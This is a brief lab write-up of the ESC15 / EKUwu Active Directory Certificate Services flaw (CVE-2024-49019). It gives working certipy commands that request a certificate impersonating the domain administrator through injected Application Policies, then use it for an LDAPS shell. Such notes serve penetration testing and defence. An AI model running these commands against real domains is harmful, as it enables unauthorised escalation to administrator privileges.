ESC15

ABOUT

ESC15, also known by the community name "EKUwu" (research by Justin Bollinger from TrustedSec) and tracked as CVE-2024-49019, describes a vulnerability affecting unpatched CAs. It allows an attacker to inject arbitrary Application Policies into a certificate issued from a Version 1 (Schema V1) certificate template. If CA is not patched, it could include these Attacker-given policies and grant certificate with unintented capabilities.

EXPLOITATION

I used Scenario A

Request a certificate, injecting "Client Authentication" Application Policy and target UPN.

certipy req -u 'netrunner@arasaka.local' -p 'P@ssword123' -dc-ip '13.13.13.13' -target 'CA.ARASAKA.LOCAL' -ca 'ARASAKA-CA' -template 'WebServer' -upn 'administrator@arasaka.local' -sid 'S-1-5-21-...-500' -application-policies 'Client Authentication'

Use certificate to get a LDAPS shell

certipy auth -pfx 'administrator.pfx' -dc-ip '13.13.13.13' -ldap-shell

RESOURCES

06 ‐ Privilege EscalationGitHub